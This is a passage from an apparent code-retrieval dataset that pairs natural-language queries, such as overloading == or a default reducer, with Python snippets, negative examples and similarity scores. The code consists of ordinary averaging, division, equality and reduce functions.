"def mean(xs):\n ave = 0\n for xs_split in xs:\n num = float(xs_split)\n print(xs_split)\n ave = ave+num\n average = ave/len(xs)\n return average",
"def add_mean(mean):\n return sum(mean)/len(mean)",
"def average(x, y):\n #helper function for get_accuracy\n average = (x+y)/2 \n return average",
"def __div__(self, _scalar):\n\t\tans = copy.deepcopy(self)\n\t\tfor i in range(0, self.n):\n\t\t\t\tans[i] /= _scalar\n\t\treturn ans",
"def mean(a, b):\n with mp.extradps(5):\n a, b = _validate_a_b(a, b)\n return a/(a + b)",
"def mean(items):\n\n return float(sum(items)) / len(items)",
"def __float__(self):\n if (self.nvar == 0): return self.t[0]\n else: raise ValueError(\"Factor is not a scalar; scope {}\".format(self.v))",
"def get_mean(iterable):\n return sum(iterable) / len(iterable)",
"def hmean(x, y):\n if x == y:\n return float(x)\n elif x == 0.0 or y == 0.0:\n return 0.0\n else:\n return 2.0 * _div(x * y, x + y)",
"def mean(L):\n\treturn sum(L) / len(L)",
"def fmean(items):\n if len(items) == 0:\n return 0.\n\n return fsum(items) / float(len(items))",
"def _avg(value1, value2, weight):\r\n if value1 is None:\r\n return value2\r\n if value2 is None:\r\n return value1\r\n return value2 * weight + value1 * (1 - weight)",
"def _avg(value1, value2, weight):\r\n if value1 is None:\r\n return value2\r\n if value2 is None:\r\n return value1\r\n return value2 * weight + value1 * (1 - weight)",
"def mean(array: list) -> float:\n\n arr_sum = 0\n\n for element in array:\n arr_sum = arr_sum + element\n\n return arr_sum/len(array)",
"def mean(points):\r\n\t\treturn sum(points)/len(points)",
"def vector_mean(vectors: List[Vector]) -> Vector:\n n = len(vectors)\n return scalar_multiply(1/n, vector_sum(vectors))",
"def vector_mean(vectors: List[Vector]) -> Vector:\n n = len(vectors)\n return scalar_multiply(1/n, vector_sum(vectors))",
"def mean(X, shape):\n return np.real(X[0, 0]) / (shape[0] * shape[1])",
"def test_scalar_division(self):\n\n a1 = tuples.Tuple([\"a\", \"b\", \"c\", \"d\"], 1, -2, 3, -4)\n\n a2 = a1 / 2\n\n self.assertEqual(a2,\n tuples.Tuple([\"a\", \"b\", \"c\", \"d\"], 0.5, -1, 1.5, -2))",
"def num (self):\n return self.value[0]/self.value[1]",
"def compute(self, node, input_vals):\r\n assert len(input_vals) == 1\r\n if node.const_attr!=None:\r\n return np.array(np.mean(input_vals[0], node.const_attr))\r\n else:\r\n return np.array(np.mean(input_vals[0]))",
"def amean (inarray,dimension=None,keepdims=0):\r\n if inarray.dtype in [N.int_, N.short,N.ubyte]:\r\n inarray = inarray.astype(N.float_)\r\n if dimension == None:\r\n inarray = N.ravel(inarray)\r\n sum = N.add.reduce(inarray)\r\n denom = float(len(inarray))\r\n elif type(dimension) in [IntType,FloatType]:\r\n sum = asum(inarray,dimension)\r\n denom = float(inarray.shape[dimension])\r\n if keepdims == 1:\r\n shp = list(inarray.shape)\r\n shp[dimension] = 1\r\n sum = N.reshape(sum,shp)\r\n else: # must be a TUPLE of dims to average over\r\n dims = list(dimension)\r\n dims.sort()\r\n dims.reverse()\r\n sum = inarray *1.0\r\n for dim in dims:\r\n sum = N.add.reduce(sum,dim)\r\n denom = N.array(N.multiply.reduce(N.take(inarray.shape,dims)),N.float_)\r\n if keepdims == 1:\r\n shp = list(inarray.shape)\r\n for dim in dims:\r\n shp[dim] = 1\r\n sum = N.reshape(sum,shp)\r\n return sum/denom",
"def __div__(self, other):\r\n T = type(other)\r\n # mat4/scalar\r\n if T==types.FloatType or T==types.IntType or T==types.LongType:\r\n return mat4(map(lambda x,other=other: x/other, self.mlist))\r\n # unsupported\r\n else:\r\n raise TypeError, \"unsupported operand type for /\"",
"def avg(vector):\n if len(vector) == 0:\n return 0\n return sum(vector) / len(vector)",
"def __div__(self, other):\r\n T = type(other)\r\n # vec4/scalar\r\n if T==types.FloatType or T==types.IntType or T==types.LongType:\r\n return vec4(self.x/other, self.y/other, self.z/other, self.w/other)\r\n # unsupported\r\n else:\r\n raise TypeError, \"unsupported operand type for /\"",
"def mean(numbers):\n return float(sum(numbers)) / float(len(numbers))",
"def mean(data):\n n = len(data)\n return sum(data)/float(n)",
"def scalar_mult(diagram, scalar):\n raise NotImplementedError",
"def scalar_divide(x, y):\n if len(list(x.size())) == 2 or len(list(x.size())) == 1:\n y_star = torch.zeros_like(y)\n y_star[0] = y[0]\n y_star[1] = -y[1]\n\n numerator = scalar_mult(y_star, x)\n denominator = scalar_mult(y, y_star)[0]\n\n if len(list(x.size())) == 3:\n y_star = torch.zeros_like(y)\n y_star[0] = y[0]\n y_star[1] = -y[1]\n\n numerator = scalar_mult(y_star, x)\n denominator = scalar_mult(y, y_star)[0]\n\n return numerator / denominator",
"def vector_mean(vectors: List[Vector]) -> Vector:\n n = len(vectors)\n\n return scalar_multiply(1/n, vector_sum(vectors))",
"def get_mean(cls, data: tuple or list) -> float:\n cls._data_validation(data)\n sum_ = fsum(data)\n n = cls.get_n(data)\n try:\n return float(sum_ / n)\n except ZeroDivisionError as exc:\n # for hyp score calculation, n = 0 for empty set is useful\n return 0",
"def geometric_mean(data):\n return pow(reduce(lambda v, mem: v * mem, data, 1.0), 1 / float(len(data)))",
"def to_scalar(self, v):\n raise NotImplementedError('to_scalar')",
"def __div__(self, scalar):\n return Vector(self.x / scalar, self.y / scalar)",
"def __call__(self, *args):\n if isinstance(args[0], (float, int, complex)):\n # scalar version:\n return self.constant\n else:\n # vectorized version:\n r = args[0].copy()\n # to get right dimension of the return array,\n # compute with args in a simple formula (sum of args)\n for a in args[1:]:\n r = r + a # in-place r+= won't work\n # (handles x,y,t - the last t just adds a constant)\n r[:] = self.constant\n return r",
"def avg(iterable: Iterable[Num]) -> float:\n\t\n\tsum_nums = 0\n\tnums = 0\n\t\n\tfor num in iterable:\n\t\tsum_nums += num\n\t\tnums += 1\n\t\n\treturn sum_nums / nums",
"def avg():\n\n # call sum method to add up the values in the collection & div by the num of items\n # call len method to compute the # of vals in collection which is divided by sum total \n mean = sum(inlist) / len(inlist)\n return mean \n\n # alternate method would be calling the reduce method with lamda \n # return reduce(lambda a, b: a + b, inlist) / len(inlist)",
"def function2(a, b):\r\n average = (a + b) / 2\r\n return average",
"def get_mean(self, X):\n raise NotImplementedError",
"def denominator(self, ???):",
"def mean(inputs):\n # pylint disable necessary for numpy and pandas\n if len(inputs) == 0: # pylint: disable=g-explicit-length-test\n return 0\n else:\n return np.mean(inputs)",
"def average(num1, num2):\n\n return (num1 + num2) / 2",
"def get_mean(numlist):\n return np.mean(numlist)",
"def combine_scalars(values, alpha=0.1):\n values = [x for x in values if x]\n if not values:\n return None\n try:\n mean = np.mean(values)\n stddev = np.std(values)\n except:\n print(values)\n raise\n if stddev > alpha * mean:\n return None\n return mean",
"def __rdiv__(self, _scalar):\n\t\treturn self / _scalar",
"def mean(a_series):\n return float(sum(a_series) / max(len(a_series) * 1.0, 1.0))",
"def scalar(f):\n def g(X: tuple()):\n return Scalar(f(Scalar(X)))\n return g",
"def calc_mean(a, b, c, d, e):\n return (a + b + c + d + e) / 5"
] | [
"0.696143",
"0.6685009",
"0.65835285",
"0.6494379",
"0.6486431",
"0.647589",
"0.6461953",
"0.644082",
"0.640487",
"0.63789093",
"0.6378846",
"0.6364099",
"0.6329329",
"0.6322551",
"0.6314783",
"0.6298621",
"0.6284843",
"0.62669075",
"0.62524444",
"0.62499195",
"0.6235518",
"0.6224494",
"0.620951",
"0.62045795",
"0.6184314",
"0.61744523",
"0.6156649",
"0.61536336",
"0.61092",
"0.608809",
"0.608809",
"0.6083761",
"0.60720074",
"0.6049691",
"0.60438657",
"0.60438657",
"0.60438657",
"0.6039313",
"0.6033236",
"0.603303",
"0.6021092",
"0.60003066",
"0.60003066",
"0.5996805",
"0.59888446",
"0.597899",
"0.5974496",
"0.5968048",
"0.5968044",
"0.5965595",
"0.59628564",
"0.5960565",
"0.5930119",
"0.5929627",
"0.59238744",
"0.59116936",
"0.5911656",
"0.59055835",
"0.5903044",
"0.5887971",
"0.588715",
"0.58865273",
"0.58807707",
"0.58740383",
"0.58733857",
"0.58733857",
"0.58651567",
"0.5864459",
"0.5863824",
"0.5863824",
"0.58585995",
"0.5855774",
"0.5850479",
"0.5844424",
"0.5830256",
"0.5825727",
"0.5823594",
"0.5821502",
"0.58199716",
"0.5811106",
"0.58067805",
"0.5803852",
"0.5802347",
"0.57908213",
"0.5786453",
"0.57859576",
"0.5769224",
"0.5767026",
"0.5761916",
"0.57589",
"0.5758136",
"0.575623",
"0.5752087",
"0.5750081",
"0.5745936",
"0.57306194",
"0.572675",
"0.57253647",
"0.57092756",
"0.5703564",
"0.569568"
] | 0.0 | -1 |
overload == which is useful for tests | def __eq__(self, other):
return np.all([
self.__getattribute__(name) == other.__getattribute__(name)
for name in self._fields
]) | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def testEquality(self):\n pass",
"def __eq__(self,*args):\r\n pass",
"def __eq__(self,*args):\r\n pass",
"def __eq__(self,*args):\r\n pass",
"def __eq__(self,*args):\r\n pass",
"def __eq__(self,*args):\r\n pass",
"def __eq__(self,*args):\r\n pass",
"def __eq__(self,*args):\r\n pass",
"def __eq__(self,*args):\r\n pass",
"def __eq__(self,*args):\r\n pass",
"def __eq__(self,*args):\r\n pass",
"def __eq__(self,*args):\r\n pass",
"def __eq__(self,*args):\r\n pass",
"def __eq__(self,*args):\r\n pass",
"def __eq__(self,*args):\r\n pass",
"def __eq__(self,*args):\r\n pass",
"def __eq__(self,*args):\r\n pass",
"def __eq__(self,*args):\r\n pass",
"def __eq__(self,*args):\r\n pass",
"def __eq__(self,*args):\r\n pass",
"def __eq__(self,*args):\r\n pass",
"def __eq__(self, *args):\r\n pass",
"def __eq__(self, *args):\r\n pass",
"def __eq__(self, *args):\r\n pass",
"def __eq__(self, *args):\r\n pass",
"def __eq__(self, *args):\r\n pass",
"def __eq__(self, *args):\r\n pass",
"def __eq__(self, *args):\r\n pass",
"def __eq__(self, *args):\r\n pass",
"def __eq__(self, *args):\r\n pass",
"def __eq__(self, *args):\r\n pass",
"def __eq__(self, *args):\r\n pass",
"def __eq__(self,*args):\n pass",
"def __eq__(self,*args):\n pass",
"def __eq__(self,*args):\n pass",
"def __eq__(self,*args):\n pass",
"def __eq__(self,*args):\n pass",
"def __eq__(self,*args):\n pass",
"def __eq__(self,*args):\n pass",
"def __eq__(self,*args):\n pass",
"def __eq__(self,*args):\n pass",
"def __eq__(self,*args):\n pass",
"def __eq__(self,*args):\n pass",
"def __eq__(self,other):\n return self is other",
"def is_equal(self, a, b):\n return a == b",
"def equals(self, other): # -> bool:\n ...",
"def __eq__(self, other):\n return self is other",
"def __eq__(self, other):\n return self is other",
"def test_equal(self):\n self.assertTrue(self.a == self.a)\n self.assertFalse(self.a != self.a)",
"def __eq__(self: _TT, other: object) -> bool:\n return self.eq(other) # type: ignore",
"def __eq__(self, other):\n pass",
"def __eq__(self, other):\n pass",
"def is_equal(self, a, b):\n return a is b",
"def __eq__(self, other):\n return equal(self, other)",
"def __eq__(self, oth):\n return int(self) != oth",
"def test_eq(self):\n dummy = DummyCryptographicObject()\n self.assertTrue(dummy == dummy)",
"def equals(x, y):\n return x == y",
"def __eq__(self, other):\n return self.value == other.value",
"def values_eq(self, a, b):\r\n return a == b",
"def __eq__(self, other):\n return are_equal(self, other)",
"def __eq__(self, other):\n return are_equal(self, other)",
"def __eq__(self, argument):\n return super().__eq__(argument)",
"def __eq__(self, other):\n if other != None:\n return self == other\n else:\n return False",
"def __eq__(self, other):\n if other != None:\n return self == other\n else:\n return False",
"def __eq__(self, other: t.Any) -> bool:\n return self._op_bool('__eq__', other)",
"def __eq__(self, other):\r\n if other is not None:\r\n return self.value() == other.value()\r\n else:\r\n return False",
"def __eq__(self, other):\n raise NotImplementedError",
"def __eq__(self, other):\n raise NotImplementedError",
"def __eq__(self, other):\n raise NotImplementedError",
"def __eq__(self, other):\n return self.value == other or self.value == other.value",
"def exact(cls, lhs, rhs):\n return lhs == rhs",
"def __eq__(self, other):\n return self.is_(other)",
"def __eq__(self, other):\r\n return self.__name == other.__name",
"def __eq__(self, other):\r\n return self.__name == other.__name",
"def test_equality(self):\n # Make explicitly sure we're using ==:\n self.assertTrue(Comparable(1) == Comparable(1))\n self.assertFalse(Comparable(2) == Comparable(1))",
"def __eq__(self,other):\n try: return self.object==other.object and isinstance(self,type(other))\n except: return False",
"def __eq__(self, v):\n\t\treturn self is v or (self.__class__ == v.__class__ and self.AEM_comparable() == v.AEM_comparable())",
"def __eq__(self, other):\n raise NotImplementedError()",
"def same_as(self, other):\n return super().__eq__(other)",
"def __eq__(self, other):\n return isinstance(other, self.__class__)",
"def __eq__(self, other):\r\n\t\tif self.eqHash == other.eqHash:\r\n\t\t\treturn True\r\n\t\telse:\r\n\t\t\treturn False",
"def __eq__(self, other):\n if other is None:\n return False\n if self.value == other.value:\n return True\n return False",
"def __eq__(self, other) -> bool:\n return str(self) == str(other)",
"def __eq__(self, other):\n\n if type(other) != type(self):\n return False\n if other.description != self.description:\n return False\n if other.func != self.func:\n return False\n return True",
"def test_eq_invalid(self):\n self.assertFalse(self.instance == '123')",
"def __eq__(self, other):\r\n\t\treturn (self.type == other.type and self.value == other.value)",
"def __eq__(self, other):\n return self.__dict__ == other",
"def __eq__(self, name):\n return self.name == name",
"def test_eq_true(self):\n other = Sample(self.sample_id, self.sample_template)\n self.assertTrue(self.tester == other)",
"def __eq__(self, other):\n return str(self) == str(other)",
"def __eq__(self, other):\n return str(self) == str(other)",
"def __eq__(self, other):\n return str(self) == str(other)",
"def __eq__( self, other ):\n return self.data == other.data",
"def __eq__(self, other):\r\n return self.__dict__ == other.__dict__",
"def __eq__(self, other):\n return (str(self) == str(other))",
"def is_equal(o1: object, o2: object) -> bool:\n if o1 is None and o2 is None:\n return True\n if o1 is None:\n return False\n return o1 == o2",
"def __eq__(self, other):\n raise NotImplementedError('must be implemented by subclass')",
"def __eq__(self, frac):\n return self.equal == frac.equal",
"def __eq__(self, other):\n return self.name == other.name",
"def testEqual(a, b):\n if a == b:\n print('Pass')\n else:\n print('Fail')",
"def __eq__(self, rhs):\n result = False\n \n if self.code == rhs.code:\n result = True\n \n return result"
] | [
"0.8219239",
"0.8051525",
"0.8051525",
"0.8051525",
"0.8051525",
"0.8051525",
"0.8051525",
"0.8051525",
"0.8051525",
"0.8051525",
"0.8051525",
"0.8051525",
"0.8051525",
"0.8051525",
"0.8051525",
"0.8051525",
"0.8051525",
"0.8051525",
"0.8051525",
"0.8051525",
"0.8051525",
"0.79099905",
"0.79099905",
"0.79099905",
"0.79099905",
"0.79099905",
"0.79099905",
"0.79099905",
"0.79099905",
"0.79099905",
"0.79099905",
"0.79099905",
"0.7776272",
"0.7776272",
"0.7776272",
"0.7776272",
"0.7776272",
"0.7776272",
"0.7776272",
"0.7776272",
"0.7776272",
"0.7776272",
"0.7776272",
"0.7751492",
"0.7740263",
"0.76543874",
"0.7645492",
"0.7645492",
"0.7641876",
"0.7596806",
"0.7587007",
"0.7587007",
"0.75818574",
"0.7546607",
"0.7509322",
"0.74750394",
"0.74706537",
"0.74341655",
"0.74336994",
"0.7433473",
"0.7433473",
"0.74080026",
"0.7403467",
"0.7403467",
"0.73924834",
"0.7377648",
"0.73676944",
"0.73676944",
"0.73676944",
"0.7349434",
"0.73456836",
"0.7316528",
"0.73100245",
"0.73100245",
"0.7289215",
"0.7282583",
"0.7270293",
"0.72636086",
"0.72622114",
"0.72579664",
"0.7255045",
"0.72286105",
"0.72181785",
"0.72124237",
"0.7205996",
"0.7200204",
"0.7183714",
"0.7179569",
"0.71617496",
"0.7161007",
"0.7161007",
"0.7161007",
"0.715812",
"0.7148745",
"0.71416396",
"0.71382993",
"0.7132677",
"0.7124439",
"0.7115531",
"0.71118087",
"0.710934"
] | 0.0 | -1 |
Default reducer for distinctions. Expects all distinctions to follow | def __reduce__(self):
return instanceReducer(self) | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def __reduce__(self):\n\t\treturn self.__class__, (self.dist, self.frozen)",
"def evaluation_reducer(self) -> Union[Reducer, Dict[str, Reducer]]:\n return Reducer.AVG",
"def __reduce__(self): # real signature unknown; restored from __doc__\r\n pass",
"def _reduce(self, action):\n assert len(self.stack) >= 2, \"ERROR: Cannot reduce with stack length less than 2\"\n \n # STUDENT\n # hint: use list.pop()\n # END STUDENT\n rightarc = self.stack.pop()\n leftarc = self.stack.pop()\n head = rightarc if action == Actions.REDUCE_L else leftarc\n mod = leftarc if action == Actions.REDUCE_L else rightarc\n self.stack.append( StackEntry(head.headword, head.headword_pos, self.combiner(head.embedding,mod.embedding)) )\n return DepGraphEdge((head.headword, head.headword_pos),(mod.headword, mod.headword_pos))",
"def __reduce__(self, *args, **kwargs): # real signature unknown\n pass",
"def __reduce__(self, *args, **kwargs): # real signature unknown\n pass",
"def __reduce__(self, *args, **kwargs): # real signature unknown\n pass",
"def __reduce__(self, *args, **kwargs): # real signature unknown\n pass",
"def __reduce__(self, *args, **kwargs): # real signature unknown\n pass",
"def reduce(self, reduce_op, value, axis): # pylint: disable=useless-super-delegation\n return super(OneDeviceStrategy, self).reduce(reduce_op, value, axis)",
"def __reduce__(self, *args, **kwargs) -> Any:\n ...",
"def set_gate_reducer(self, reducer: ReductionRule):\n self.gate_reducer_ = reducer",
"def toposorted_actions(self) -> Iterable[Action]:\n # Here we execute two \"nanopasses\" (a term borrowed from compiler implementation)\n #\n # 1. Traverse a values-and-actions graph, reducing it to a dependency graph containing actions\n #\n # 2. Perform a toposort over actions (using Kahn's algorithm https://en.wikipedia.org/wiki/Topological_sorting)\n #\n # TODO: switch to graphlib from standard library\n #\n # TODO: Consider using Tarjan's strongly connected components algorithm\n # Rationale: Tarjan's SCC would find loops and produce a helpful diagnostic\n\n # 1. Dependency graph representation optimized for toposort\n o: dict[Action, set[Action]] = {} # for actions: action -> set of outgoing dependency edges\n i: dict[Action, set[Action]] = {} # for actions: action -> set of incoming dependency edges\n\n # set of nodes without incoming edges\n s: Set[Action] = set()\n\n # 1. Transform execution plan into dependency graph\n for action in self.actions:\n # if action does not depend on any other action, add it to set s\n if all(inp.producer() is None for inp in action.inputs()):\n s.add(action)\n # add outgoing edges to graph, if any\n for output in action.outputs():\n for depending_action in output.consumers():\n # add an edge action -> depending_action to the graph\n if action not in o:\n o[action] = set()\n if depending_action not in i:\n i[depending_action] = set()\n o[action].add(depending_action)\n i[depending_action].add(action)\n\n # 2. Now run Kahn's algorithm (could be separated from previous to improve abstraction)\n # resulting list\n l: list[Action] = []\n\n while len(s) > 0:\n n = s.pop()\n l.append(n)\n if n in o:\n o_n = o[n]\n del o[n]\n else:\n o_n = set()\n while len(o_n) > 0:\n # remove edge from the graph\n m = o_n.pop()\n i[m].remove(n)\n if len(i[m]) == 0:\n del i[m]\n s.add(m)\n\n if len(o) != 0 or len(i) != 0:\n for (node, edges) in o.items():\n print(\"Source: \" + str(node))\n for e in edges:\n print(\" Edge: \" + str(e))\n raise Exception(\"Dependency graph has at least one cycle\")\n else:\n return l",
"def category_reducer(category):\n if not \"--\" in category:\n if category in BAD_CATEGORIES:\n return \"Unknown\"\n return category\n\n main, sub = category.split(\"--\")\n\n main = main.strip()\n if main in [\"Science\"]:\n return sub.strip()\n else:\n return main",
"def _call_reduce_action(self, context, subresults):\n debug = self.debug\n result = None\n bt_result = None\n production = context.production\n\n if self.build_tree:\n # call action for building tree node if enabled.\n if debug:\n h_print(\"Building non-terminal node\",\n \"'{}'.\".format(production.symbol.name), level=2)\n\n bt_result = NodeNonTerm(context, children=subresults,\n production=production)\n context.node = bt_result\n if not self.call_actions_during_tree_build:\n return bt_result\n\n sem_action = production.symbol.action\n if sem_action:\n assignments = production.assignments\n if assignments:\n assgn_results = {}\n for a in assignments.values():\n if a.op == '=':\n assgn_results[a.name] = subresults[a.index]\n else:\n assgn_results[a.name] = bool(subresults[a.index])\n\n if type(sem_action) is list:\n if assignments:\n result = sem_action[production.prod_symbol_id](\n context, subresults, **assgn_results)\n else:\n result = sem_action[production.prod_symbol_id](context,\n subresults)\n else:\n if assignments:\n result = sem_action(context, subresults, **assgn_results)\n else:\n result = sem_action(context, subresults)\n\n else:\n if debug:\n h_print(\"No action defined\",\n \" for '{}'.\".format(production.symbol.name), level=1)\n if len(subresults) == 1:\n if debug:\n h_print(\"Unpacking a single subresult.\", level=1)\n result = subresults[0]\n else:\n if debug:\n h_print(\"Result is a list of subresults.\", level=1)\n result = subresults\n\n if debug:\n h_print(\"Action result =\",\n \"type:{} value:{}\"\n .format(type(result), repr(result)), level=1)\n\n # If build_tree is set to True, discard the result of the semantic\n # action, and return the result of treebuild_reduce_action.\n return bt_result if bt_result is not None else result",
"def reduce(self, app, nodes, result):",
"def _reduce_distances(self, threshold):\n reduced = self.orig_dists.copy()\n reduced[reduced <= threshold] = 0\n # Remove ignored from all consideration\n ignrd_indices = [self.index[name] for name in self.ignored]\n if ignrd_indices:\n reduced[:,ignrd_indices] = np.inf\n reduced[ignrd_indices,:] = np.inf\n # Check if the given parameters are feasible\n chsn_indices = set(self.index[name] for name in self.chosen)\n avail_indices = set(self.index[name] for name in self.available)\n ca_indices = chsn_indices | avail_indices\n unassigned_indices = np.array(list(self._not_ignored_inds - ca_indices))\n if len(unassigned_indices) == 0:\n unassigned_orphans = unassigned_indices\n else:\n ca_indices = list(ca_indices)\n avail_in_range = np.count_nonzero(reduced[np.ix_(unassigned_indices,ca_indices)] == 0, axis=1)\n unassigned_orphans = unassigned_indices[avail_in_range == 0]\n return reduced, unassigned_orphans",
"def allreduce_hook(state: AllReduceState, grad: torch.Tensor):\n if state.gradient_predivide_factor > 1:\n grad.div_(state.gradient_predivide_factor)\n dist.all_reduce(grad, group=state.process_group)\n if state.gradient_postdivide_factor > 1:\n grad.div_(state.gradient_postdivide_factor)",
"def optimize_actions(actions):\n result = {}\n\n def donothing(oid, index_oid, action1, action2):\n del result[(oid, index_oid)]\n\n def doadd(oid, index_oid, action1, action2):\n result[(oid, index_oid)] = action1\n\n def dochange(oid, index_oid, action1, action2):\n result[(oid, index_oid)] = ReindexAction(\n action2.index, action2.mode, oid,\n )\n\n def dodefault(oid, index_oid, action1, action2):\n result[(oid, index_oid)] = action2\n\n statefuncs = {\n # txn asked to remove an object that previously it was\n # asked to add, conclusion is to do nothing\n (IndexAction, UnindexAction):donothing,\n # txn asked to change an object that was not previously added,\n # concusion is to just do the add\n (IndexAction, ReindexAction):doadd,\n # txn action asked to remove an object then readd the same\n # object. We translate this to a single change action.\n (UnindexAction, IndexAction):dochange,\n }\n\n for newaction in actions:\n oid = newaction.oid\n index_oid = newaction.index_oid\n oldaction = result.get((oid, index_oid))\n statefunc = statefuncs.get(\n (oldaction.__class__, newaction.__class__),\n dodefault,\n )\n statefunc(oid, index_oid, oldaction, newaction)\n\n result = list(sorted(result.values()))\n return result",
"def _get_reduction(self):\n if (not self._allow_sum_over_batch_size and\n distribute_lib.has_strategy() and\n (self.reduction == losses_utils.ReductionV2.AUTO or\n self.reduction == losses_utils.ReductionV2.SUM_OVER_BATCH_SIZE)):\n raise ValueError(\n 'Please use `tf.keras.losses.Reduction.SUM` or '\n '`tf.keras.losses.Reduction.NONE` for loss reduction when losses are '\n 'used with `tf.distribute.Strategy` outside of the built-in training '\n 'loops. You can implement '\n '`tf.keras.losses.Reduction.SUM_OVER_BATCH_SIZE` using global batch '\n 'size like:\\n```\\nwith strategy.scope():\\n'\n ' loss_obj = tf.keras.losses.CategoricalCrossentropy('\n 'reduction=tf.keras.losses.Reduction.NONE)\\n....\\n'\n ' loss = tf.reduce_sum(loss_obj(labels, predictions)) * '\n '(1. / global_batch_size)\\n```\\nPlease see '\n 'https://www.tensorflow.org/tutorials/distribute/custom_training'\n ' for more details.')\n\n if self.reduction == losses_utils.ReductionV2.AUTO:\n return losses_utils.ReductionV2.SUM_OVER_BATCH_SIZE\n return self.reduction",
"def _call_reduce_action(self, context, subresults):\n debug = self.debug\n result = None\n bt_result = None\n production = context.production\n\n if self.build_tree:\n # call action for building tree node if enabled.\n if debug:\n h_print(\"Building non-terminal node\",\n \"'{}'.\".format(production.symbol.name), level=2)\n\n bt_result = treebuild_reduce_action(context, nodes=subresults)\n if not self.call_actions_during_tree_build:\n return bt_result\n\n sem_action = production.symbol.action\n if sem_action:\n assignments = production.assignments\n if assignments:\n assgn_results = {}\n for a in assignments.values():\n if a.op == '=':\n assgn_results[a.name] = subresults[a.index]\n else:\n assgn_results[a.name] = bool(subresults[a.index])\n\n if type(sem_action) is list:\n if assignments:\n result = sem_action[production.prod_symbol_id](\n context, subresults, **assgn_results)\n else:\n result = sem_action[production.prod_symbol_id](context,\n subresults)\n else:\n if assignments:\n result = sem_action(context, subresults, **assgn_results)\n else:\n result = sem_action(context, subresults)\n\n else:\n if debug:\n h_print(\"No action defined\",\n \" for '{}'.\".format(production.symbol.name), level=1)\n if len(subresults) == 1:\n if debug:\n h_print(\"Unpacking a single subresult.\", level=1)\n result = subresults[0]\n else:\n if debug:\n h_print(\"Result is a list of subresults.\", level=1)\n result = subresults\n\n if debug:\n h_print(\"Action result =\",\n \"type:{} value:{}\"\n .format(type(result), repr(result)), level=1)\n\n # If build_tree is set to True, discard the result of the semantic\n # action, and return the result of treebuild_reduce_action.\n return bt_result if bt_result is not None else result",
"def action_map(self) -> Dict[str, CLIActionType]:\n return add_dicts({\n \"dump\": self.dump_action,\n \"dump-macrosizes\": self.dump_macrosizes_action,\n \"dump_macrosizes\": self.dump_macrosizes_action,\n \"synthesis\": self.synthesis_action,\n \"syn\": self.synthesis_action,\n \"par\": self.par_action,\n \"synthesis_to_par\": self.synthesis_to_par_action,\n \"synthesis-to-par\": self.synthesis_to_par_action,\n \"syn_to_par\": self.synthesis_to_par_action,\n \"syn-to-par\": self.synthesis_to_par_action,\n \"synthesis_par\": self.synthesis_par_action,\n \"synthesis-par\": self.synthesis_par_action,\n \"syn_par\": self.synthesis_par_action,\n \"syn-par\": self.synthesis_par_action,\n \"hier_par_to_syn\": self.hier_par_to_syn_action,\n \"hier-par-to-syn\": self.hier_par_to_syn_action,\n \"par_to_drc\": self.par_to_drc_action,\n \"par-to-drc\": self.par_to_drc_action,\n \"par_to_lvs\": self.par_to_lvs_action,\n \"par-to-lvs\": self.par_to_lvs_action,\n \"drc\": self.drc_action,\n \"lvs\": self.lvs_action\n }, self.all_hierarchical_actions)",
"def reducer(token_pair):\n\treturn (token_pair[0], sum(token_pair[1]))",
"def reducer(state: State, action: Action) -> State:\n state = copy.deepcopy(state)\n if isinstance(state, dict):\n state = forest.state.State.from_dict(state)\n if isinstance(action, dict):\n try:\n action = forest.actions.Action.from_dict(action)\n except TypeError:\n return state.to_dict()\n\n if action.kind == SET_FIGURES:\n state.layers.figures = action.payload\n\n elif action.kind == ON_ADD:\n state.layers.mode.state = \"add\"\n\n elif action.kind == ON_CLOSE:\n row_index = action.payload\n try:\n layer_index = sorted(state.layers.index.keys())[row_index]\n del state.layers.index[layer_index]\n except IndexError:\n pass\n\n elif action.kind == ON_EDIT:\n row_index = action.payload\n layer_index = sorted(state.layers.index.keys())[row_index]\n state.layers.mode.state = \"edit\"\n state.layers.mode.index = layer_index\n\n elif action.kind == SAVE_LAYER:\n # NOTE: Layer index is stored in payload\n layer_index = action.payload[\"index\"]\n settings = action.payload[\"settings\"]\n if layer_index in state.layers.index:\n state.layers.index[layer_index].update(settings)\n else:\n state.layers.index[layer_index] = settings\n\n elif action.kind == SET_ACTIVE:\n active = action.payload[\"active\"]\n row_index = action.payload[\"row_index\"]\n row_to_layer = sorted(state.layers.index.keys())\n try:\n layer_index = row_to_layer[row_index]\n state.layers.index[layer_index][\"active\"] = active\n except IndexError:\n pass\n\n return state.to_dict()",
"def reduce_run():",
"def __reduce__(\n self: TokenMatcher,\n ) -> Tuple[Any, Any]: # Precisely typing this would be really long.\n data = (\n self.__class__,\n self.vocab,\n self._patterns,\n self._callbacks,\n self.defaults,\n )\n return (unpickle_matcher, data)",
"def reveal(self, dst=None):\n op = torch.distributed.ReduceOp.BXOR\n if dst is None:\n return comm.get().all_reduce(self.share, op=op)\n else:\n return comm.get().reduce(self.share, dst, op=op)",
"def reduce_tree(self, handle_actions, terminal_converter=None):\r\n def handle_node(node):\r\n \"\"\"\r\n Return the result representing the node, using recursion.\r\n\r\n Call the appropriate `handle_action` for this node. As its inputs,\r\n feed it the output of `handle_node` for each child node.\r\n \"\"\"\r\n if not isinstance(node, ParseResults):\r\n # Then treat it as a terminal node.\r\n if terminal_converter is None:\r\n return node\r\n else:\r\n return terminal_converter(node)\r\n\r\n node_name = node.getName()\r\n if node_name not in handle_actions: # pragma: no cover\r\n raise Exception(u\"Unknown branch name '{}'\".format(node_name))\r\n\r\n action = handle_actions[node_name]\r\n handled_kids = [handle_node(k) for k in node]\r\n return action(handled_kids)\r\n\r\n # Find the value of the entire tree.\r\n return handle_node(self.tree)",
"def reducer2():\n\n riders = 0 # The number of total riders for this key\n num_hours = 0 # The number of hours with this key\n old_key = None\n\n for line in sys.stdin:\n data = line.strip().split('\\t')\n\n if len(data) != 2:\n continue\n\n new_key, count = data\n\n if old_key and old_key != new_key:\n print('{}\\t{}'.format(old_key, riders / num_hours))\n riders = 0\n num_hours = 0\n\n riders += float(count)\n num_hours += 1\n old_key = new_key\n\n if old_key is not None:\n print('{}\\t{}'.format(old_key, riders / num_hours))",
"def applyDemapping(self):\n pass",
